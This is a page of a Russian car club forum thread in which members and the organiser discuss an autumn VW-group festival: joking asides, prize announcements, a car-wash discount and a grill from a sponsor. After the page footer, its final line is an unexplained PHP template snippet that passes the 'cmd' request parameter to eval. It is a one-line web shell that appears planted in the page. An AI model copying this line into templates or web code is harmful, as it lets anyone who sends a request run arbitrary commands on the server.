+ Ответить в теме
Страница 3 из 11 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя
Показано с 21 по 30 из 105

Тема: Автофестиваль в конце сентября!


  1. #21
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    Я уже предлагал Вадику понизить градус пафосности на первый год и объявить закрытие сезона летних встреч ВАГ клубов =) Обеспечить 10 мангалов и попросить привезти мясо =) Ну и под шумок провести конкурсы и фотографов с девочками пригласить =) По-моему было бы забавно по теплой осени всем собраться раз в полгода и пообщаться. А раз в неделю я под мост ездить не хочу=)
    In a world that's digital, we choose to be ANALOG.

  2. #22
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от koljamba Посмотреть сообщение
    тут просто сказали, что Вадик хочет без репостов) обойтись! я не понимаю как так?)
    Все верно вам сказали. Сейчас объясню: я уже и так сильно переборщил с рекламой [например на drive2]
    Той что есть более чем достаточно для того чтобы на праздник приехал 101 автомобиль или больше.
    И я очень удивлен вашей реакцией на наш фестиваль!!!!! Все вы взрослые умные и опытные люди, но почему вы в очередной раз наивно поверили тому что написано [причем с ошибками] что фестиваль проводится для вашего удовольствия и веселья???!!! Мне даже обидно что вы так плохо обо мне подумали((( Наш фестиваль ничем не хуже других фестивалей и соответственно его единственная цель заработать побольше денег на доверчивых автолюбителях. Только в нашем случае схема развода новая: вход действительно бесплатный, но я заключил пари с несколькими азартными игроками на очень большие суммы $$$ $$$ о том что на наш фестиваль приедет более 100 машин. И больше ничего делать не нужно - я сейчас занят планированием на что мне потратить эти легкие деньги, наверное куплю BMW и перееду жить в Америку...
    Последний раз редактировалось crazy_engineer; 16.09.2015 в 13:34.

  3. #23
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    Аххаха=) На выигранные у Вадика деньги я готов проставиться на встрече ГТИ клуба минералкой Боржоми! =) (с моей доплатой)
    In a world that's digital, we choose to be ANALOG.

  4. #24
    Модератор koljamba will become famous soon enough Аватар для koljamba
    Регистрация
    31.07.2012
    Откуда
    москва
    Машина
    superb
    Сообщений
    239
    в этом посте коментарии только про модель)) ни кто и не смотрит что она пишет!))
    ну я понял что ты знаешь что делаешь!)
    оганизатора привлекли хорошего, она 100 машин вытянет легко) без рекламы!

  5. #25
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Похвастаюсь дополнительным призом который получит владелец выбранного зрителями лучшего автомобиля марки SEAT, аналогично с призом за лучший Audi это тоже коллекционная отлично детализированная модель оптимального масштаба 1:18.
    Но прошу прощения у владельца указанного SEAT-а за то что в имеющиеся у меня две недели на подготовку фестиваля я не успел найти модель SEAT-а и поэтому в качестве замены выбрал легендарный суперкар Lamborghini Countach, причем самую первую серийную модель LP400 которая выпускалась в 1974—1978 и еще не была "украшена" V-образным антикрылом как поздние модели. Из всех серийных моделей LP400 больше всего походила на концепт-кар LP500 который был показан на моторшоу в Женеве в 1971 году и произвел фурор!
    Учитывая что марка SEAT позиционируется в концерне VAG с несколько спортивным уклоном, наверное это допустимая замена. Кроме того ярко-желтый цвет модели совпадает с фирменным цветом модификаций Cupra.

    а еще мне очень нравится форма задней арки - автор Lamborghini Countach итальянский автомобильный дизайнер Марчелло Гандини так же создал симпатичную Audi 50 который позднее продавался как Volkswagen Polo










    Далее привожу фотографии с сайта производителя










  6. #26
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Еще одна хорошая новость: LowRideGirls приняли наше приглашение и приедут в гости!!!!!!!!!

  7. #27
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Под утро завершил изготовление комплекта звезд которыми будут награждаться владельцы автомобилей Skoda которые в ходе голосования зрителей будут выбраны на 1, 2 и 3 места. Пока остывает шпиндель станка посплю часик и сразу примусь за комплект звезд для VW.


  8. #28
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Добавил в список еще одну мойку автомобилей, она расположена как раз на пути по которому наиболее удобно заезжать на парковку VAGfest-а [адрес: город Видное, ул. Старонагорная, д. 17] Ссылка на Яндекс Карты
    На данной мойке имеется 6 постов для мойки автомобилей с отдельными въездами! + шиномонтаж. Мойка легкового автомобиля с ковриками стоит 300 руб., для участников VAGfest-а согласована скидка 20% т.е. итоговая стоимость мойки всего 240 руб., промо-код слово: "фестиваль".

  9. #29
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Вам нравятся большие веселые компании и мясо приготовленное на настоящем огне?! Тогда для вас очередная отличная новость: спонсор фестиваля Американские грили WEBER выделил 2 больших гриля из топовой линейки угольных грилей. Один я сразу забрал себе на дачу, он действительно очень большой, даже не поместился в багажник моего Tiguan-а, пришлось двигать вперед задний ряд сидений [см. фото]. А второй будет вручен в качестве приза автоклубу команда которого окажется лучшей. Естественно еще доукомплектую этот приз углями и вкусным мясом.



    Последний раз редактировалось crazy_engineer; 23.09.2015 в 10:18.

  10. #30
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Доделал очередной комплект звёзд для награждения владельцев лучших VW. Чуть позже соответственно сделаю еще три звезды для VW коммерческие автомобили.


+ Ответить в теме
Страница 3 из 11 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя

Похожие темы

  1. АВТОФЕСТИВАЛЬ "Десятилетие Питерского СтритРейса!"
    от Musketier в разделе Встречи и мероприятия
    Ответов: 1
    Последнее сообщение: 13.03.2019, 00:30
  2. Новгородский Автофестиваль '09
    от HAWK в разделе Встречи и мероприятия
    Ответов: 0
    Последнее сообщение: 26.06.2009, 10:57
  3. Встреча 05 Сентября
    от inVENTOr в разделе Встречи и мероприятия
    Ответов: 16
    Последнее сообщение: 05.09.2008, 20:46
  4. 1 сентября...
    от -=Нержавейкин=- в разделе Курилка
    Ответов: 9
    Последнее сообщение: 13.09.2007, 02:18
  5. Ответов: 0
    Последнее сообщение: 22.08.2007, 18:38

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}